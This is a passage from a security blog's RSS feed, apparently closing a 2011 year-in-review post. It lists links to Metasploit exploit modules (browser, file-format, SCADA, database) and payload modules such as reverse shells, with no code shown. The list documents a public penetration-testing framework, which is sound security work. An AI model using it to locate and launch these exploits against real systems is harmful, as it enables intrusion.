<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/mozilla_nstreerange.rb">/modules/exploits/windows/browser/mozilla_nstreerange.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/adobe_flashplayer_avm.rb">/modules/exploits/windows/browser/adobe_flashplayer_avm.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/cisco_anyconnect_exec.rb">/modules/exploits/windows/browser/cisco_anyconnect_exec.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb">/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/mozilla_interleaved_write.rb">/modules/exploits/windows/browser/mozilla_interleaved_write.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/vlc_amv.rb">/modules/exploits/windows/browser/vlc_amv.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/citrix_gateway_actx.rb">/modules/exploits/windows/browser/citrix_gateway_actx.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb">/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/mozilla_mchannel.rb">/modules/exploits/windows/browser/mozilla_mchannel.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb">/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/java_codebase_trust.rb">/modules/exploits/windows/browser/java_codebase_trust.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/realplayer_cdda_uri.rb">/modules/exploits/windows/browser/realplayer_cdda_uri.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb">/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/antivirus/ams_xfr.rb">/modules/exploits/windows/antivirus/ams_xfr.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/antivirus/ams_hndlrsvc.rb">/modules/exploits/windows/antivirus/ams_hndlrsvc.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb">/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/cytel_studio_cy3.rb">/modules/exploits/windows/fileformat/cytel_studio_cy3.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb">/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb">/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb">/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb">/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb">/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb">/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/ezip_wizard_bof.rb">/modules/exploits/windows/fileformat/ezip_wizard_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/scadaphone_zip.rb">/modules/exploits/windows/fileformat/scadaphone_zip.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb">/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/visiwave_vwr_type.rb">/modules/exploits/windows/fileformat/visiwave_vwr_type.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/dvdx_plf_bof.rb">/modules/exploits/windows/fileformat/dvdx_plf_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb">/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb">/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb">/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/aol_desktop_linktag.rb">/modules/exploits/windows/fileformat/aol_desktop_linktag.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/tugzip.rb">/modules/exploits/windows/fileformat/tugzip.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/gta_samp.rb">/modules/exploits/windows/fileformat/gta_samp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/videospirit_visprj.rb">/modules/exploits/windows/fileformat/videospirit_visprj.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb">/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb">/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/visio_dxf_bof.rb">/modules/exploits/windows/fileformat/visio_dxf_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/microp_mppl.rb">/modules/exploits/windows/fileformat/microp_mppl.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb">/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/wireshark_packet_dect.rb">/modules/exploits/windows/fileformat/wireshark_packet_dect.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb">/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/lotusnotes_lzh.rb">/modules/exploits/windows/fileformat/lotusnotes_lzh.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb">/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb">/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/fileformat/vlc_webm.rb">/modules/exploits/windows/fileformat/vlc_webm.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb">/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/ftp/servu_chmod.rb">/modules/exploits/windows/ftp/servu_chmod.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/ftp/ability_server_stor.rb">/modules/exploits/windows/ftp/ability_server_stor.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/ftp/goldenftp_pass_bof.rb">/modules/exploits/windows/ftp/goldenftp_pass_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/ftp/scriptftp_list.rb">/modules/exploits/windows/ftp/scriptftp_list.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/postgres/postgres_payload.rb">/modules/exploits/windows/postgres/postgres_payload.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/realwin_on_fcs_login.rb">/modules/exploits/windows/scada/realwin_on_fcs_login.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/scadapro_cmdexe.rb">/modules/exploits/windows/scada/scadapro_cmdexe.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/daq_factory_bof.rb">/modules/exploits/windows/scada/daq_factory_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/factorylink_vrn_09.rb">/modules/exploits/windows/scada/factorylink_vrn_09.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/iconics_genbroker.rb">/modules/exploits/windows/scada/iconics_genbroker.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/procyon_core_server.rb">/modules/exploits/windows/scada/procyon_core_server.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb">/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb">/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/factorylink_csservice.rb">/modules/exploits/windows/scada/factorylink_csservice.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb">/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/codesys_web_server.rb">/modules/exploits/windows/scada/codesys_web_server.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb">/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/winlog_runtime.rb">/modules/exploits/windows/scada/winlog_runtime.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/scada/igss9_misc.rb">/modules/exploits/windows/scada/igss9_misc.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/smtp/njstar_smtp_bof.rb">/modules/exploits/windows/smtp/njstar_smtp_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/bcaaa_bof.rb">/modules/exploits/windows/misc/bcaaa_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/hp_omniinet_4.rb">/modules/exploits/windows/misc/hp_omniinet_4.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/wireshark_lua.rb">/modules/exploits/windows/misc/wireshark_lua.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/mini_stream.rb">/modules/exploits/windows/misc/mini_stream.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/splayer_content_type.rb">/modules/exploits/windows/misc/splayer_content_type.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/wireshark_packet_dect.rb">/modules/exploits/windows/misc/wireshark_packet_dect.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/hp_omniinet_3.rb">/modules/exploits/windows/misc/hp_omniinet_3.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/avidphoneticindexer.rb">/modules/exploits/windows/misc/avidphoneticindexer.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/pxexploit.rb">/modules/exploits/windows/misc/pxexploit.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/stream_down_bof.rb">/modules/exploits/windows/misc/stream_down_bof.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/misc/citrix_streamprocess.rb">/modules/exploits/windows/misc/citrix_streamprocess.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/mssql/mssql_payload_sqli.rb">/modules/exploits/windows/mssql/mssql_payload_sqli.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb">/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/oracle/extjob.rb">/modules/exploits/windows/oracle/extjob.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/mysql/mysql_payload.rb">/modules/exploits/windows/mysql/mysql_payload.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/lotus/domino_icalendar_organizer.rb">/modules/exploits/windows/lotus/domino_icalendar_organizer.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/lotus/lotusnotes_lzh.rb">/modules/exploits/windows/lotus/lotusnotes_lzh.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/exploits/windows/tftp/opentftp_error_code.rb">/modules/exploits/windows/tftp/opentftp_error_code.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/linux/armle/adduser.rb">/modules/payloads/singles/linux/armle/adduser.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/linux/x64/exec.rb">/modules/payloads/singles/linux/x64/exec.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb">/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/linux/x64/shell_bind_tcp.rb">/modules/payloads/singles/linux/x64/shell_bind_tcp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/java/shell_reverse_tcp.rb">/modules/payloads/singles/java/shell_reverse_tcp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb">/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb">/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb">/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb">/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/cmd/windows/download_eval_vbs.rb">/modules/payloads/singles/cmd/windows/download_eval_vbs.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/windows/speak_pwned.rb">/modules/payloads/singles/windows/speak_pwned.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/windows/loadlibrary.rb">/modules/payloads/singles/windows/loadlibrary.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/singles/generic/custom.rb">/modules/payloads/singles/generic/custom.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/stages/linux/x64/shell.rb">/modules/payloads/stages/linux/x64/shell.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/stagers/linux/x64/reverse_tcp.rb">/modules/payloads/stagers/linux/x64/reverse_tcp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/stagers/linux/x64/bind_tcp.rb">/modules/payloads/stagers/linux/x64/bind_tcp.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/stagers/java/reverse_https.rb">/modules/payloads/stagers/java/reverse_https.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/stagers/java/reverse_http.rb">/modules/payloads/stagers/java/reverse_http.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/stagers/windows/reverse_ipv6_http.rb">/modules/payloads/stagers/windows/reverse_ipv6_http.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/stagers/windows/reverse_ipv6_https.rb">/modules/payloads/stagers/windows/reverse_ipv6_https.rb</a></li>
<li><a href="https://metasploit.com/svn/framework3/trunk/modules/payloads/stagers/windows/reverse_http.rb">/modules/payloads/stagers/windows/reverse_http.rb</a></li>
</ul>
<br /> Tagged: <a href='http://blog.c22.cc/tag/additions/'>additions</a>, <a href='http://blog.c22.cc/tag/metasploit/'>Metasploit</a>, <a href='http://blog.c22.cc/tag/svn/'>svn</a>, <a href='http://blog.c22.cc/tag/year-in-review/'>year in review</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3674/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3674&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2011/12/31/metasploit-modules-a-year-in-review/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2011/11/msflogo.png" medium="image">
			<media:title type="html">msflogo</media:title>
		</media:content>
	</item>
	</channel>
</rss>
